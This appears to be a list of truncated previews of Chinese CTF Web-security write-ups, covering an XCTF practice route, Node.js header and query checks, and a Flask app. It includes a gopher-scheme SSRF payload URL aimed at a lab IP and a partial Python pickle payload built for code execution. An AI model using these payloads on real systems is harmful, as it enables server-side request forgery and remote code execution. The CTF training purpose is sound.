这题考察 PHP 和 JS 代码审计,利用 JS 的解析特性,绕过了 req.headers 检查,利用 Node.js (Express) 参数个数限制,绕过了 req.query 检查。 知识点1: HTTP 头部格式:HTTP 头部是以键值对的形式存在的,每个…
攻防世界-XCTF-Web安全最佳刷题路线 每次写序都是最烦恼的,都不知道写什么,CTF是团队竞赛,有很多分支(Web安全,密码学,杂项,Pwn,逆向,安卓),可以每个领域都涉猎,或许感觉那样很酷,但终究每个人只擅长其中一二,攻防世界-XCTF-Web安全最佳刷题路线,我已经整理好了,干就完了,留个遗憾,10分题还没有刷,能做出来的...
直接开炮 pyload:http://61.147.171.105:53922/use.php?url=gopher%3A//127.0.0.1%3A80/_POST%2520/index.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AUser-Agent%253A%2520curl/7.43.0%250D%250AAccept%253A%2520%252A/%252A%250D%250AContent-Type%253A%2520application/x-...
from flask import Flask, render_template, request, render_template_string,redirect from verify import * from User import User import base64 from waf import waf app = Flask(__name__,static_folder="static",template_folder="templates") user={} @app.route('/register', methods=["POST","GET"...
新春分享赛2020 (天璇Merak) web sqlcheckin 考虑万能密码。 webtmp 考察python反序列化 读源码可知需要覆盖name和category 且需要避免使用R指令码,网上可以搜到使用C指令码来绕过执行RCE 构造payload: s3 = b"\x80\x03c__main__\nsecret\n}(Vname\nVhaha\nVcategory\nVgaga\nub0c__main__\nAnimal\n)\...